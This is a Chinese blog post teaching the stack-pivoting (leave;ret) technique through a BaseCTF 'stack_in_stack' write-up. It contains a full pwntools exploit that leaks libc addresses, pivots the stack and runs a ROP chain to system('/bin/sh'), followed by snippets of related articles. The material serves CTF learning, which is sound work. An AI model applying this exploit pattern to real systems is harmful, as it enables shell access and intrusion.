栈迁移(详解)

已于 2024-09-22 21:00:54 修改
阅读量691 收藏 11
点赞数 9
文章标签: 网络安全
于 2024-09-09 21:21:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yufeiyu66/article/details/142069531
版权

栈迁移

原理

栈迁移主要利用了leave_ret这个指令

leave返回上级函数时,恢复原本的栈空间leavemov esp,ebp pop ebp
ret返回上级函数后,执行上级函数的命令ret等同于 pop eip (不存在这样的指令
esp
'''
ebp
ret

在函数的先执行到leave指令时,会将ebp处填充的地址pop到ebp中去,这样栈基地址发生了变化,在下次的栈位置就会发生变化

请添加图片描述

有个图对这些指令变化阐述的比较清楚

来自栈迁移的原理&&实战运用 - ZikH26 - 博客园 (cnblogs.com)

请添加图片描述

请添加图片描述

例题

basectf week3 stack_in_stack

想要赛后要附件的师傅可以加我

请添加图片描述
请添加图片描述

请添加图片描述

通过这里的动态调式才发现溢出了0x10个字节,故通过栈迁移来进行

第一个read
payload=(p64(gift)+p64(main)).ljust(0x30,b'\x00') 
payload+=p64(leak-0X8)+p64(leave_ret)  

p.send(payload)

统一解释一下这个leave_ret

下面的步骤大概是这样的

请添加图片描述

请添加图片描述

请添加图片描述

请添加图片描述

请添加图片描述

请添加图片描述

exp

from pwn import *
from LibcSearcher import *
#p = process('./pwn')
p=remote('challenge.basectf.fun',32210)
context(log_level='debug')
elf = ELF('./pwn')
#libc=ELF('./libc.so.6')
#libc=elf.libc
#gdb.attach(p)
#pause()
main=0x4010e0
gift=0x4011c6
leave_ret=0x4012f2

p.recvuntil('mick0960.\n')
leak=int(p.recv(14),16)
print(hex(leak))

payload=(p64(gift)+p64(main)).ljust(0x30,b'\x00')
payload+=p64(leak-0X8)+p64(leave_ret)

p.send(payload)

p.recvuntil(b'You found the secret!\n')
p.recvuntil(b'0x')
puts=int(p.recv(12),16)
print(hex(puts))

p.recvuntil(b'mick0960.\n')
leak2 = int(p.recv(14), 16)
libc=LibcSearcher("puts",puts)

'''
libc_base=puts - elf.symbols['puts']

print(hex(libc_base))
read=libc_base+elf.symbols['read']
print(hex(read))

bin_sh_addr=libc_base+next(libc.search(b'/bin/sh'))
system_addr=libc_base+libc.sym['system']
'''
libc_base=puts-libc.dump('puts')
system_addr=libc_base+libc.dump('system')
bin_sh_addr=libc_base+libc.dump('str_bin_sh')

pop_rdi=libc_base+0x2a3e5
payload1=(p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)).ljust(0x30,b'a')
payload1+=p64(leak2-0x8)+p64(leave_ret)
#p.recvuntil(b'mick0960.\n')
p.send(payload1)
p.interactive()
-yfy-
关注
迁移图解
qq_40410406的博客
11-11 1676
迁移 场景 1 如果程序的保护措施canary开启,会在prev ebp空间的下一个低地址存放一个随机值,当我们溢出时会将这个随机值覆盖,程序检测到这个随机值发生变化以后会自动退出(崩溃),此时就无法进行溢出攻击,所以需要另寻出路。 2 溢出长度不足以使用直接 ROP 3 溢出 payload 会出现空字符截断,且gadget地址含有空字符 4 在泄露地址信息后需要新的 ROP payload 5 如果开启了不可执行保护,就需要迁移到bss段或者data段或者其他位置执行我们的gadge
迁移
weixin_44932880的博客
10-13 700
leave ret 原理 一次leave 将 rsp指向 原rbp+8 , rbp指向原rbp 的内容, move rsp rbp (rbp的地址赋值给rsp的地址,即rsp指向rbp) pop rbp (rbp指向rsp的内容(rbp的内容),rsp+=8) 一次ret rip指向原rsp的内容,rsp+=8 pop rip 一次leave ret 使rbp指向原rbp的内容,rsp指向 原rbp+16,rip指向原rbp+8 两次leave ret
迁移小总结
weixin_61283545的博客
04-24 469
[BUUCTF]PWN14——not_the_same_3dsctf_2016_mcmuyanga的博客-优快云博客
PWN-迁移
yjh_fnu_ltn的博客
06-01 1095
有限,导致构造的ROP链不能完全写入到中,此时需要进行迁移,将迁移到能接受更多数据的位置(改变相继sp、bp寄存器的值),位函数调用、传参构造一个新的空间。迁移的位置因考虑在read的读取范围之内,首先应该考虑迁移的目标位置target,直接选择输入s的首地址即可,在。可见bp寄存器指向的空间已经被覆盖(数据随便输入,仅实验用),后面的函数返回地址也被修改,此时执行最后的。(覆盖掉bp寄存器指向的空间上的值)来更新sp寄存器。(调用者的sp寄存器值),bp所指向的空间上的值为。
迁移学习
最新发布
cyy001128的博客
03-31 1138
当存在溢出且可溢出长度不足以容纳 payload 时(在完成一般的溢出攻击时,有一个条件是“上有足够的地方让攻击者进行布局”),可采用迁移。一般这种情况下,溢出仅能覆盖 ebp 、 eip。因为原来的空间不足,所以要构建一个新的空间放下 payload ,因此称为迁移迁移往往在发生溢出的函数能够溢出的只有rbp与返回地址时进行,由于不能输入更多数据来构造rop链,一般会把迁往两个位置,一是原来的,二是.bss段。
迁移总结
2302_79899078的博客
03-13 1995
迁移,orw
PWN——迁移
L2329794714的博客
08-29 1737
简单一句话就是控制esp指针的指向。实现指令:eave;ret 指令Leave等价于:其实就是在做恢复上一次空间的操作。但这过程中能恢复到上次的的关键数据为当前ebp指向地址上值(oldebp),当我们通过溢出覆盖原本的oldebp值时,然后将leave;ret 程序段地址放在返回地址上,那么就可以实现将esp迁移至我们想要的地方(取决于oldebp上的覆盖的地址,注意这里会抬高4字节,64位抬8字节)。第一次leave第一次ret:因为esp还是指向leave;.........
CIDOC CRM技术详解
[CIDOC CRM技术详解](https://cidoc-crm.org/sites/default/files/document.jpg) # 摘要 本文旨在解析CIDOC CRM的基本概念和核心模型,以及其在文化遗产信息系统中的实践应用和高级开发技巧。首先,文章介绍了...
顺序实现与基本操作详解
空间不足,则可能需要进行空间扩展,这涉及到重新分配更大的存储空间并迁移原有元素。 7. 异常情况处理 程序中对可能出现的异常情况做了定义,如OVERFLOW标志,表示空间溢出。在实际操作中,应当对各种可能...
Unity项目迁移:从旧项目到新目录结构,迁移步骤详解
[Unity项目迁移:从旧项目到新目录结构,迁移步骤详解](https://gamedevbeginner.com/wp-content/uploads/Prefabs-Feature.jpg) # 摘要 随着技术的快速发展,Unity游戏开发项目迁移成为提升开发效率、优化资源管理...
溢出——cannary绕过方法详解
qq_42882717的博客
03-14 2681
cannary绕过
迁移原理介绍与应用
weixin_39529207的博客
02-20 5988
本文将对CTF Pwn中「迁移」(又称「转移」)这一技术进行介绍与分析,希望读完本文后以下问题将不再困扰你: 什么是迁移迁移解决了什么问题? 怎么使用迁移这个技巧? 开始之前,有如下预备知识会极大提升你的阅读体验: CTF Pwn是在做什么?提权(Getshell)是什么意思? 在操作系统内存布局中,是一种怎样的结构,具有怎样的特点? x86中常用寄存器的名称与作用?函数调用的原理与过程是怎样的? 溢出攻击的核心技巧是什么? 溢出是怎么回事?  在预备知识的4个问
pwn --迁移
zszcr的博客
04-07 7159
迁移主要是为了解决溢出可以溢出空间大小不足的问题迁移的实现:通过将ebp覆盖成我们构造的fake_ebp ,然后利用leave_ret这个gadget将esp劫持到fake_ebp的地址上leave_ret相当于:mov %ebp,%esp pop %ebp pop %eip接下来拿HITCON-Training-master 的 lab6做例子题目链接:https://github.com...
迁移(leave ret)(更适合pwn宝宝体质的迁移~)
Kata_Jhin的博客
05-15 2592
更适合pwn入门新手体质的迁移教程
迁移浅析
qq_43409582的博客
11-23 4205
0x00 线下有道迁移的题目,因为当时没有好好学,对于迁移这一块儿一知半解的,就没出,痛定思痛,在此就好好研究一下。 0x01 前置知识 首先迁移就是因为可写空间太小不够rop,就把迁移到别的地方去构造payload。 而迁移最重要的是两个汇编命令 leave; ret; leave相对于是mov esp,ebp;pop ebp; ret是pop eip; 0x02 stack pivoting 先从32位来理解迁移的利用原理。 stack pivoting,正如它所描述的,该技巧就是劫持指针
【pwn】 关于迁移
wintersun的地带
05-19 3358
[pwn] 关于迁移在我们仅仅只能够控制ebp的情况下,我们怎么才能够控制eip去拿到我们的shell呢。以下为科普以32位程序举例,在使用call这个命令,进入一个函数的时候,程序会进行一系列操作: push eip+4;push ebp;mov ebp,esp;来保护现场,避免执行完函数后堆不平衡以及找不到之前的入口地址。执行完函数后会进行一系列操作来还原现场leave;ret; 这
pwn入门之迁移
wangxunyu6的博客
03-08 2192
迁移可以用于处理溢出的情况。当溢出且可溢出长度不足以容纳 payload 时,可以通过迁移来构建一个新的空间以放下 payload。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值